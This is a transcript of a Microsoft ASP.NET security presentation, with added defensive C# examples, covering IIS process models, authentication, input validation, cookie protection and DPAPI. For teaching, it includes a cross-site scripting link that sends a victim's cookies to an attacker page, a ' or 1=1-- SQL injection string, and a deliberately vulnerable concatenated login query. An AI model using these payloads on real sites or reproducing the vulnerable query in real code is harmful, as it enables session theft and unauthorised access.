
ASP.NET Security Part 1 Dave Glover



Presentation on theme: "ASP.NET Security Part 1 Dave Glover"— Presentation transcript:

1 ASP.NET Security Part 1
Dave Glover, dglover@microsoft.com
Developer & Platform Group, Microsoft Australia
4/17/2017 4:38 AM © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2 Resources
- Patterns and Practices: Proven Practices, Predictable Results
- Available from your book stores; free download from MSDN as PDFs
- http://www.microsoft.com/security

3 Today's ASP.NET Agenda
Part 1: ASP.NET Security
Part 2: ASP.NET Security (cont.), Web Services Security, ASP.NET Whidbey Logon Support

4 Agenda
- IIS Security and Process Model
- Validating Input
- Securing Forms Authentication Data

5 Security and Process Model

6 IIS 5 & 6.0 Architecture: Security and Process Models
[Architecture diagram. IIS 5 on Windows 2000: INETINFO (with the metabase) hosting ISAPI filters and ISAPI extensions (ASP, etc.), DLLHOST.exe for out-of-process applications, and Aspnet_wp.exe hosting the ASP.NET ISAPI with its CLR app domains. IIS 6 on Windows 2003: HTTP.SYS on top of TCP/IP, WAS (Config Mgr and Process Mgr), INETINFO with the metabase, and W3WP.EXE worker processes in Application Pool 1, Application Pool 2 and a Web Garden, each hosting ISAPI filters, ISAPI extensions (ASP, etc.) and the ASP.NET ISAPI with CLR app domains.]

7 ASP.NET Process Identity
Windows 2000:
- Default is ASPNET (local service account)
- Can also run as System or a configured account using <processModel>
- New for the Fx 1.1 release: support for DPAPI-encrypted credentials in <processModel>
- Aspnet_setreg.exe for the 1.0 Framework
Windows Server 2003:
- Uses the IIS 6 process model
- Process identity is configurable
- Default identity is 'Network Service'

8 IIS Security
[Slide diagram: five questions and the IIS mechanism that answers each.]
- Where should the code execute? Protection and pooling
- Who did the request come from? Authentication: Anonymous, Basic, Digest, X.509 certificates, Integrated Windows, Passport (IIS 6)
- What is the caller allowed to do? Authorization: web metabase permissions, Windows access control lists
- Are calls from this IP address allowed? IP restrictions
- Should traffic be encrypted? SSL/TLS
Notes:
- IP restrictions let administrators grant or deny access to callers using IP addresses or domain names.
- SSL/TLS (Secure Sockets Layer/Transport Layer Security) may be used to encrypt communications between browsers and web servers. Encrypting that traffic is vital if it includes sensitive or potentially injurious data such as passwords, credit card numbers, or authentication cookies.
- Authentication is a mechanism for identifying the caller. IIS supports several different types of authentication; each type has pros and cons, as indicated on the next slide.
- Authorization is a set of rules defining who can access which resources on your web site. Authorization goes hand in hand with authentication: if you don't know who the caller is, you can't apply access rules based on the caller's identity.
- "Web metabase permissions" refers to the IIS access permissions that can be applied to virtual directories: Read, Run Scripts, Execute, Write, and Browse.
- IIS 5's protection model lets administrators decide whether ISAPI DLLs run in Inetinfo.exe, in a pooled process separate from Inetinfo.exe, or in dedicated processes of their own.
- IIS 6 supports application pooling, which gives wider latitude in specifying which applications run in which processes and what the identities of those processes are.

9 ASP.NET Security
- Who did the request come from? Authentication: Windows, Passport, Forms
- Use process identity or caller identity? Impersonation
- What is the caller allowed to do? Authorization: ACL authorization, URL authorization
Notes:
- ASP.NET supports three types of authentication and two types of authorization. Both are discussed in detail in the slides that follow.
- Windows authentication: uses existing Windows user accounts; ideal for intranet applications.
- Passport authentication: convenient for users (single sign-in); puts credential storage in the hands of others.
- Forms authentication: typically uses eBay-style login pages; ideal for Internet applications.

10 Authentication
- Anonymous
- Integrated Windows Authentication: IE challenge/response (NTLM/Kerberos)
- Digest: more secure than Basic
- Basic: clear text, so it must be over SSL/TLS
- Impersonation

11 Impersonation
Impersonation Off (default):
- Work is done in the context of the ASP.NET worker process
- Required for connection pooling
Impersonation On:
- Work is done under the caller's identity
- System-level auditing
- No connection pool
- Web.config: <identity impersonate="true" />
Notes: Under the hood, Windows uses thread tokens for access checks when threads have access tokens attached, and process tokens when threads lack tokens of their own. At the operating system level, impersonating a user involves little more than attaching that user's access token to the current thread.

12 Authorization Strategies
- Windows security and ACLs: ACLs are checked for Windows auth
- URL authorization
- Enterprise Services/COM+ roles: require impersonation
- Windows Server 2003 AuthZ Framework: task-based authorisation; declarative and programmatic checks
- Authorisation & Profile Application Block: role-based authorisation

13 Request Processing
[Pipeline diagram: a request enters the host (IIS or IE, native code) and passes into the ASP.NET runtime (.NET code), where it goes through URL & file authorization, the HTTP modules (including the application's Global.asax module) and finally an HTTP handler (an ASP.NET page or ASP.NET service), all sharing the HttpContext.]

14 Intranet Applications
[Diagram: Bob, Alice and Bill authenticate to IIS/ASP.NET on the web server with Integrated Windows authentication; ACL authorization applies, and the ASP.NET process or impersonated identity connects to SQL Server on the database server over a trusted connection protected by IPSec (Windows authentication, SQL permissions, database roles).]
Notes:
- For intranet applications, where users already have Windows accounts, use Windows authentication and ACL authorization.
- Whether you use SQL Server logins or Windows authentication to authenticate to the database is a choice you make; either works fine in this scenario. Whichever you choose, you may also want to use IPSec or SSL/TLS to encrypt communications between the web server and database server.
- If you use IPSec to protect communications between the web server and database server, you can also restrict access to the database server so that ONLY the web server can call it.
- Encrypting communications between the web server and database server might seem like overkill, but remember that many attacks come from BEHIND the firewall (that is, from employees of your company).

15 Internet Applications
[Diagram: Bob, Alice and Bill reach IIS/ASP.NET on the web server through the firewall; IIS allows anonymous access (no authentication), ASP.NET applies forms authentication and URL authorization, and the ASP.NET process identity connects to SQL Server on the database server over a trusted connection protected by IPSec (Windows authentication, SQL permissions, database roles).]
Notes:
- For Internet applications (think eBay and Amazon.com), where users do NOT have Windows accounts, use forms authentication and URL authorization.
- Tokens passed from IIS to ASP.NET (not shown) represent the anonymous user (by default, IUSR_machinename) but are not used, since we're using URL authorization.

16 Demo 1: Authentication & Authorization
- Windows Integrated
- Forms Based
- Unrestricted File Types

17 Validating Input

18 All Input is Evil!!
- All uncontrolled inputs must either be checked or encoded, e.g. TextBox.Text, URI parameters and cookies
- Encoding is best if you are just echoing web content: use HttpUtility.HtmlEncode(UserInput.Text)
- Avoid using file names as input if possible

19 Encoding Good, Validation Better!!
- Always use the 'known good' case
- Validation controls: always on the server, and on the client too when possible; you must check that Page.IsValid
- Framework regular expression support: System.Text.RegularExpressions
- ASP.NET 1.1 request validation: automatically rejects requests containing certain characters and character sequences (e.g., "<script")

20 Cross-Site Scripting Attacks
Example link (the href points at the URL of the site targeted by the attack):
<a href=" Search=<script language='javascript'> document.location.replace (' Cookie=' + document.cookie); </script>">…</a>
The query string contains embedded JavaScript that redirects to the attacker's page and transmits the cookies issued by Search.aspx in a query string.
Notes: The query string used in this example (which is taken from the demo that follows) includes JavaScript code that gathers up the cookies (document.cookie) issued to the victim by the targeted site (Search.aspx) and transmits them to the attacker's site (EvilPage.aspx) in a query string. Redirection is accomplished by calling document.location.replace. All EvilPage.aspx has to do to retrieve the cookies is parse them from the query string. This attack is alarmingly effective if Search.aspx "trusts" input and echoes the query string to the page, and is a fine example of how cross-site scripting can be used to steal cookies.
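As an added illustration (not the deck's demo code), a search page code-behind that applies the two defences of slides 18 to 20: a "known good" RegularExpressionValidator checked through Page.IsValid on the server, and HttpUtility.HtmlEncode on the echoed term, so the payload above is displayed rather than executed. The control names and the KnownGood pattern are this example's assumptions.

```csharp
using System;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

// Code-behind for an assumed GoodSearch.aspx whose markup declares SearchBox,
// SearchValidator and Heading. Added example; not the deck's GoodSearch.aspx.
public class GoodSearch : Page
{
    protected TextBox SearchBox;
    protected RegularExpressionValidator SearchValidator;
    protected Label Heading;

    // "Known good" case: only what a search term legitimately needs. Anything else,
    // including the "<script" sequence, is rejected outright rather than cleaned up.
    // \z rather than $ so a trailing newline cannot slip past the check.
    public const string KnownGood = @"^[A-Za-z0-9 .,-]{1,50}\z";

    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);
        SearchValidator.ControlToValidate = "SearchBox";
        SearchValidator.ValidationExpression = KnownGood;
        SearchValidator.ErrorMessage = "Use letters, digits, spaces and . , - only (1 to 50 characters).";
        // Client-side script is a convenience for users; the server-side check is the control.
        SearchValidator.EnableClientScript = true;
    }

    protected void Search_Click(object sender, EventArgs e)
    {
        // Validators run before the click handler, but nothing stops the handler
        // from using the bad value unless the page checks IsValid itself.
        if (!Page.IsValid)
            return;
        Heading.Text = ResultHeading(SearchBox.Text);
    }

    // BadSearch did: Heading.Text = "Results for " + term; with the deck's payload the
    // browser then executes the embedded script. HtmlEncode turns < > & " into entities,
    // so the same input comes back as "Results for &lt;script language='javascript'&gt;..."
    // and is shown as text. Encoding is the right layer when you merely echo content;
    // the validator above is the stronger layer when you can define what is acceptable.
    public static string ResultHeading(string term)
    {
        return "Results for " + HttpUtility.HtmlEncode(term);
    }
}
```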

21 SQL Injection Attacks
Model query:
SELECT COUNT (*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'
Malicious query (always true; Count always 1):
SELECT COUNT (*) FROM Users WHERE UserName='' or 1=1-- AND Password=''
Protect using stored procs and parameterised queries.
Notes:
- This type of query is often used in forms authentication code to validate user names and passwords.
- The model query is what the developer envisioned executing when he or she wrote the code. It returns the number of records in the Users table where the user name is "Jeff" and the password is "imbatman". A return value of 0 means there are no matching records, and therefore that the credentials the user entered are invalid.
- The malicious query demonstrates how an attacker can use malicious input to change the very nature of the command executed against the database. It returns the number of records in the Users table. If the application interprets a non-zero return value to mean that the credentials are valid, the attacker gains illicit entry to the site.

22 Demo 2
- Badlogon: SQL Injection
- BadSearch: Cross Site Scripting

23 Securing Forms Authentication Data
If possible, use Integrated Authentication instead.

24 Forms Authentication
[Flowchart: Is the resource available to anonymous users? Yes: return the resource. No: is there a valid authentication cookie? No: go to the login page; if the login succeeds, issue an auth cookie, otherwise access is denied. Yes: is the requestor authorized? Yes: return the resource; No: access denied.]
Notes:
- Forms authentication is nothing new; it has been around for a long time and is used on popular sites such as eBay and Amazon.com. Numerous ASP sites use it, too. What's significant here is that ASP.NET formalizes forms authentication and does most of the work for you (meaning you write less code to make it happen).
- You provide the login page and the logic for validating logins; ASP.NET provides everything else.

25 Forms Authentication
- Protect login credentials with SSL/TLS: <forms loginUrl="https://.../LoginPage.aspx" />
- Don't store passwords; store password hashes
- Limit authentication cookie lifetimes to minimize the window for replay attacks
- Assume authentication cookies are spoofed or stolen when performing sensitive operations
- Don't rely on forms authentication to protect resources not owned by ASP.NET
Notes:
- Sometimes you can't store password hashes and must store encrypted passwords instead. For example, if you want the ability to return lost passwords to users, you must store them in recoverable form.
- eBay recently reduced the lifetimes of its persistent authentication cookies from several weeks to a few hours, presumably to reduce the site's attack surface.
- "Assume authentication cookies are spoofed" means asking users to log in again before performing potentially dangerous operations such as executing a credit card purchase, even if the request contains a valid authentication cookie. Example: eBay uses authentication cookies to identify you, but even after you have logged in, eBay asks for your user name and password again before performing certain operations (such as retrieving a seller's address).
- RE: "Don't rely on forms authentication to protect resources not owned by ASP.NET": forms authentication doesn't protect HTM(L) files, JP(E)G files, and other files that aren't mapped to Aspnet_isapi.dll in the IIS metabase. One solution is to map them to Aspnet_isapi.dll in the IIS metabase and to StaticFileHandler in Machine.config or Web.config. Note that doing so impedes performance (particularly when ASP.NET is paired with IIS 5).

26 Authentication Cookies
- Forms authentication cookies are encrypted and validated by default: this prevents reading and alteration, but doesn't prevent theft and replay
- Preventative measures are required to defend against unauthorized access
Defense                 | Comments
Restrict cookies to SSL | Prevents cookie theft (strongest defense)
Limit cookie lifetime   | Mitigates replay attacks by limiting the attack window
Disable sliding renewal | Mitigates replay attacks by limiting the attack window
Notes: You can disable cookie encryption, but don't! Even SSL won't protect you from cookie tampering by a legitimate client.

27 Authentication Cookie Lifetime
Temporary authentication cookies:
- Lifetime limited (by default) to 30 minutes; controlled by the <forms> timeout attribute
- Subject to sliding renewal in ASP.NET 1.0
- Sliding renewal disabled by default in 1.1; controlled by the <forms> slidingExpiration attribute
Persistent authentication cookies:
- Default lifetime = 50 years!
- Longer lifetime = greater vulnerability to replay attacks
Notes:
- ASP.NET 1.0 lacks an option for disabling sliding renewal of forms authentication cookies.
- The fact that persistent authentication cookies default to a lifetime of 50 years is a BIG DEAL. NEVER issue an authentication cookie that's good for 50 years unless you don't care about security.
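An added example (not the deck's code) of the cookie-lifetime advice on slides 25 to 27 in ASP.NET 1.x terms: instead of RedirectFromLoginPage(user, true), which issues the 50-year persistent cookie, the login page builds its own FormsAuthenticationTicket with a short expiry and marks the cookie SSL-only. It assumes the caller has already validated the credentials; the eight-hour and twenty-minute lifetimes are this example's choices.

```csharp
using System;
using System.Web;
using System.Web.Security;

// Added example; not from the deck. Issues the forms authentication cookie with an
// explicit lifetime instead of the defaults that RedirectFromLoginPage applies.
public class CookieIssuer
{
    // Lifetimes chosen for this example: "remember me" gets hours, not decades.
    static readonly TimeSpan PersistentLifetime = TimeSpan.FromHours(8);
    static readonly TimeSpan SessionLifetime = TimeSpan.FromMinutes(20);

    // Call only after the credentials have been validated (see the hashed-password slide).
    public static void Issue(HttpResponse response, string userName, bool rememberMe)
    {
        DateTime issued = DateTime.Now;
        DateTime expires = issued + (rememberMe ? PersistentLifetime : SessionLifetime);

        // The expiry inside the ticket is what FormsAuthenticationModule enforces, so a
        // stolen cookie stops working at 'expires' even if the browser still holds it.
        // With slidingExpiration="false" (the 1.1 default) that expiry is absolute.
        FormsAuthenticationTicket ticket =
            new FormsAuthenticationTicket(1, userName, issued, expires, rememberMe, "");

        // Encrypt() applies the <forms protection="All"> encryption and MAC keyed by
        // <machineKey>; this is the "encrypted and validated by default" of slide 26.
        HttpCookie cookie = new HttpCookie(FormsAuthentication.FormsCookieName,
                                           FormsAuthentication.Encrypt(ticket));
        cookie.Path = FormsAuthentication.FormsCookiePath;
        cookie.Secure = true;   // sent over SSL/TLS only: the "strongest defense" row of slide 26
        if (rememberMe)
            cookie.Expires = expires;   // persistent, but only for PersistentLifetime
        // No Expires means a session cookie, discarded when the browser closes.

        response.Cookies.Add(cookie);
        response.Redirect(FormsAuthentication.GetRedirectUrl(userName, rememberMe));
    }
}
```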

28 Data Protection Support
- System.Security.Cryptography classes: encrypting connection strings is easy; key management is not easy
- Data Protection API (DPAPI): present in Windows 2000 and higher; strong encryption, automatic key generation, and secure key storage (3DES and PKCS #5 encryption); the .NET FCL 1.x doesn't wrap DPAPI
- Configuration Application Block (MSDN)
Notes:
- The BIG WIN with DPAPI is that it offloads the task of key management to the operating system.
- ASP.NET doesn't map very well to the user store because all ASP.NET apps run under one user profile. ASP.NET maps very well to the machine store, which doesn't rely on user profiles.
- The downside to the machine store is that data encrypted by one app can be decrypted by another. Use per-application entropy values if you wish to privatize keys stored in the machine store. Remember that entropy values are keys that must be stored securely just like other secrets! ACLed registry keys are one place to store entropy values.

29 SQL Connection Strings
Description                                                                                   | Security
Store encrypted connection strings in Web.config; store the key in an ACLed registry entry    | Good
Let DPAPI perform key management                                                              | Better
Store encrypted connection strings in an ACLed registry key; use entropy values to harden the DPAPI encryption; store the entropy values in an ACLed registry key | Best
Notes: The Microsoft Reference Application for OpenHack (MRAO) presented in session 4 uses the "Best" approach. Also see the Configuration Application Block on MSDN.
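Added example (not from the deck or the Configuration Application Block) of the "Best" row: DPAPI machine-store encryption of a connection string with per-application entropy, called through P/Invoke because, as slide 28 says, the .NET 1.x FCL does not wrap DPAPI. Reading the entropy bytes from the ACLed registry key is left to the caller; the description string and the helper names are this example's choices.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example; not the deck's code. Machine-store DPAPI with caller-supplied entropy.
public class MachineStoreDpapi
{
    [StructLayout(LayoutKind.Sequential)]
    struct DATA_BLOB { public int cbData; public IntPtr pbData; }

    const int CRYPTPROTECT_UI_FORBIDDEN  = 0x1;  // never prompt: this runs in a worker process
    const int CRYPTPROTECT_LOCAL_MACHINE = 0x4;  // machine store: independent of the ASPNET user profile

    [DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CryptProtectData(ref DATA_BLOB pDataIn, string szDataDescr,
        ref DATA_BLOB pOptionalEntropy, IntPtr pvReserved, IntPtr pPromptStruct,
        int dwFlags, ref DATA_BLOB pDataOut);
    [DllImport("crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CryptUnprotectData(ref DATA_BLOB pDataIn, IntPtr ppszDataDescr,
        ref DATA_BLOB pOptionalEntropy, IntPtr pvReserved, IntPtr pPromptStruct,
        int dwFlags, ref DATA_BLOB pDataOut);
    [DllImport("kernel32.dll")]
    static extern IntPtr LocalFree(IntPtr hMem);

    // Copies managed bytes into unmanaged memory that DPAPI can read.
    static DATA_BLOB ToBlob(byte[] data)
    {
        DATA_BLOB blob;
        blob.cbData = data.Length;
        blob.pbData = Marshal.AllocHGlobal(data.Length);
        Marshal.Copy(data, 0, blob.pbData, data.Length);
        return blob;
    }

    // Copies DPAPI's output out of the buffer it allocated, then frees it with LocalFree.
    static byte[] FromBlob(DATA_BLOB blob)
    {
        byte[] data = new byte[blob.cbData];
        Marshal.Copy(blob.pbData, data, 0, blob.cbData);
        LocalFree(blob.pbData);
        return data;
    }

    // entropy is this application's own secret (the deck: keep it in an ACLed registry key).
    // Without it, any process on the machine could decrypt the blob, because machine-store
    // data is shared by every application on the box.
    public static byte[] Protect(byte[] plain, byte[] entropy)
    {
        DATA_BLOB dataIn = ToBlob(plain), ent = ToBlob(entropy), dataOut = new DATA_BLOB();
        try
        {
            if (!CryptProtectData(ref dataIn, "connection string", ref ent, IntPtr.Zero, IntPtr.Zero,
                    CRYPTPROTECT_LOCAL_MACHINE | CRYPTPROTECT_UI_FORBIDDEN, ref dataOut))
                throw new InvalidOperationException("CryptProtectData failed, error " + Marshal.GetLastWin32Error());
            return FromBlob(dataOut);
        }
        finally { Marshal.FreeHGlobal(dataIn.pbData); Marshal.FreeHGlobal(ent.pbData); }
    }

    // The same entropy must be presented again; a wrong value makes the call fail outright.
    public static byte[] Unprotect(byte[] cipher, byte[] entropy)
    {
        DATA_BLOB dataIn = ToBlob(cipher), ent = ToBlob(entropy), dataOut = new DATA_BLOB();
        try
        {
            if (!CryptUnprotectData(ref dataIn, IntPtr.Zero, ref ent, IntPtr.Zero, IntPtr.Zero,
                    CRYPTPROTECT_UI_FORBIDDEN, ref dataOut))
                throw new InvalidOperationException("CryptUnprotectData failed, error " + Marshal.GetLastWin32Error());
            return FromBlob(dataOut);
        }
        finally { Marshal.FreeHGlobal(dataIn.pbData); Marshal.FreeHGlobal(ent.pbData); }
    }
}
```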

30 SQL & Windows Authentication
Identity: Worker process
- Pros: connection pooling; no one-hop issues
- Cons: the ASPNET account lacks network credentials; all callers share one set of database permissions
Identity: Impersonated identity
- Pros: company policies sometimes require user-level auditing of database accesses; increased granularity of database permissions
- Cons: foils connection pooling; raises one-hop issues; added administration; grants database access to more principals
Identity: COM+ identity
- Cons: decreased performance; increased complexity
Notes:
- RE: One-hop issues: in the absence of delegation, Windows security tokens can only make one hop from machine to machine over the network. The classic case is where the web server authenticates the caller using Integrated Windows Authentication and then tries to impersonate the caller and authenticate against a remote database server. That won't work without delegation.
- Delegation isn't supported by most authentication protocols. However, in Windows Server 2003, Kerberos protocol transition and constrained delegation make all authentication protocols delegatable and can be used to work around one-hop issues.
- Bringing COM+ into the picture probably isn't justifiable unless you're using other features of COM+ (such as declarative transactions).

31 Accessing Data Securely
- Code against SQL injection attacks: use secured stored procedures or parameterized commands; don't use dynamic SQL commands
- Never use sa to access web databases; use least privileges
- Store connection strings securely (integrated security is better): DPAPI or the Configuration Application Block
- Apply administrative protections to SQL Server
- Optionally use SSL/TLS or IPSec to secure the connection to the database server
Notes: Administrative protections for SQL Server include:
- Staying up to date with SQL Server service packs and updates
- Blocking SQL Server ports at the firewall (TCP 1433 and UDP 1434)
- Assigning a strong password to the sa account
- Running SQL Server using a domain account with limited privileges
- Logging failed connection attempts

32 Hashed Password Authentication
[Diagram: Bob, Alice and Bill log in to IIS/ASP.NET on the web server with forms authentication; the web server, behind the firewall, calls SQL Server on the database server over a trusted connection protected by IPSec, using the GetUserSalt stored procedure against the Salt table and the CmpUserHash stored procedure against the Hash table.]
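Added example (not the deck's Badlogon or Goodlogon demo) bringing slides 21 and 32 together. BadLogonCount builds the slide 21 model query by concatenation, so the "' or 1=1--" input rewrites the WHERE clause; ValidateHashed runs the GetUserSalt and CmpUserHash stored procedures of slide 32 through parameterised commands and never stores or compares a clear-text password. The stored procedures' parameter names and types, the 16-byte salt and the SHA-256 digest are this example's assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;
using System.Text;

public class Logon
{
    // Badlogon: the deck's model query assembled from raw input. The SQL structure now
    // depends on the caller, which is exactly what the "' or 1=1--" input exploits.
    public static int BadLogonCount(SqlConnection conn, string user, string pwd)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE UserName='" + user
                   + "' AND Password='" + pwd + "'";
        SqlCommand cmd = new SqlCommand(sql, conn);
        return (int) cmd.ExecuteScalar();
    }

    // Assumed stored procedure contracts (names from slide 32; signatures assumed here):
    //   GetUserSalt @UserName nvarchar(50)                    -> the user's salt (varbinary) or NULL
    //   CmpUserHash @UserName nvarchar(50), @Hash binary(32)  -> 1 if the stored hash matches, else 0
    public static bool ValidateHashed(SqlConnection conn, string user, string pwd)
    {
        SqlCommand getSalt = new SqlCommand("GetUserSalt", conn);
        getSalt.CommandType = CommandType.StoredProcedure;
        // Typed, length-limited parameter: the value is data and never becomes SQL syntax.
        getSalt.Parameters.Add("@UserName", SqlDbType.NVarChar, 50).Value = user;
        object salt = getSalt.ExecuteScalar();
        if (salt == null || salt == DBNull.Value)
            return false;   // unknown user: same answer as a wrong password

        SqlCommand cmp = new SqlCommand("CmpUserHash", conn);
        cmp.CommandType = CommandType.StoredProcedure;
        cmp.Parameters.Add("@UserName", SqlDbType.NVarChar, 50).Value = user;
        cmp.Parameters.Add("@Hash", SqlDbType.Binary, 32).Value = HashPassword((byte[]) salt, pwd);
        return Convert.ToInt32(cmp.ExecuteScalar()) == 1;
    }

    // hash = SHA256(salt || UTF-8(password)). The per-user salt lives in the Salt table and the
    // digest in the Hash table; the clear-text password is never stored (slide 25).
    // Current practice would use a deliberately slow KDF such as PBKDF2 in place of a bare hash.
    public static byte[] HashPassword(byte[] salt, string pwd)
    {
        byte[] pwdBytes = Encoding.UTF8.GetBytes(pwd);
        byte[] input = new byte[salt.Length + pwdBytes.Length];
        Buffer.BlockCopy(salt, 0, input, 0, salt.Length);
        Buffer.BlockCopy(pwdBytes, 0, input, salt.Length, pwdBytes.Length);
        return new SHA256Managed().ComputeHash(input);
    }

    // Used when an account is created: a fresh random salt per user defeats precomputed tables.
    public static byte[] NewSalt()
    {
        byte[] salt = new byte[16];
        new RNGCryptoServiceProvider().GetBytes(salt);
        return salt;
    }
}
```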

33 Demo 3: Accessing Data Securely
- Goodlogon.aspx and validators (IsValid)
- GoodQuotes.aspx and query validation
- GoodSearch.aspx: HTML encoding

34 Call to Action
- Secure software requires knowledgeable and dedicated IT personnel: software isn't secure if the network is not; administration is the bedrock of security
- Secure software also requires knowledgeable and dedicated developers: proper administration is meaningless if the code you write isn't secure; most developers today don't know they're writing insecure code
Notes:
- There are two components to a secure web application: an administrative component and a programmatic component.
- The administrative component includes keeping IIS up to date with service packs and security updates, hardening routers, making sure firewalls are properly configured, etc.
- The programmatic component involves writing secure code, which is what today's Web Security track is all about.
SECURE SOFTWARE IS THE PRODUCT OF THOUGHTFUL AND DELIBERATE DESIGN!

35 Resources
- Patterns and Practices: Proven Practices, Predictable Results
- Available from your book stores; free download from MSDN as PDFs
- http://www.microsoft.com/security

36 © 2003-2004 Microsoft Corporation. All rights reserved.

